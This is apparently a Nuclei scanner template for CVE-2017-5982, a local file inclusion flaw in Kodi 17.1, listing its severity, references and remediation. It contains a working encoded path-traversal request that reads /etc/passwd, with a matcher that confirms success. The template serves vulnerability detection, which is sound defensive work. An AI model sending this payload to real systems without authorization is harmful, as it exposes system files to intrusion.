45 lines
1.4 KiB
YAML
45 lines
1.4 KiB
YAML
id: CVE-2017-5982
|
|
|
|
info:
|
|
name: Kodi 17.1 - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: |
|
|
Kodi 17.1 is vulnerable to local file inclusion vulnerabilities because of insufficient validation of user input.
|
|
remediation: |
|
|
Upgrade Kodi to a version that is not affected by the CVE-2017-5982 vulnerability.
|
|
reference:
|
|
- https://cxsecurity.com/issue/WLB-2017020164
|
|
- https://www.exploit-db.com/exploits/41312/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-5982
|
|
- https://lists.debian.org/debian-lts-announce/2024/01/msg00009.html
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2017-5982
|
|
cwe-id: CWE-22
|
|
epss-score: 0.0372
|
|
epss-percentile: 0.91582
|
|
cpe: cpe:2.3:a:kodi:kodi:17.1:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: kodi
|
|
product: kodi
|
|
tags: cve2017,cve,kodi,lfi,edb
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100fa4dbd08aff64d97403d7fb368e7231d1a0730e75422275f56f2de2d62285992022100d2b8678f5fb9dc8a061deabd9eaf63b6ee9db983944639a0c7d1fe041ac49d57:922c64590222798bb761d5b6d8e72950 |